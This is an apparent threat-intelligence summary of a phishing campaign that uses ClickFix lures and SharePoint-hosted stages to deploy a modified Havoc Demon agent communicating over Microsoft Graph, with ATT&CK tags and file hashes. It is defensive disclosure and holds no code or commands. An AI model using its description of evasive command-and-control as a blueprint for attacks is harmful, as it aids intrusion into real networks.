A phishing campaign combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The attack starts with an HTML attachment using ClickFix to deceive users into executing malicious PowerShell commands. The malware stages are hidden behind SharePoint sites, and a modified Havoc Demon uses Microsoft Graph API to obscure C2 communications. The attack chain includes sandbox evasion, Python shellcode loader, KaynLdr for DLL loading, and a customized Havoc Demon DLL. The threat actor creates two files in SharePoint for C2 communication, encrypts data with AES-256, and supports various malicious commands. This campaign demonstrates the integration of public services with modified open-source tools to evade detection. Author: AlienVault
Related Tags:
havoc demon agent
KaynLdr
clickfix
T1558
T1059.006
T1566.001
T1021.002
havoc
T1059.001
Associated Indicators:
989F58C86343704F143C0D9E16893FAD98843B932740B113E8B2F8376859D2DD
CC151456CF7DF7FF43113E5F82C4CE89434AB40E68CD6FB362E4AE4F70CE65B3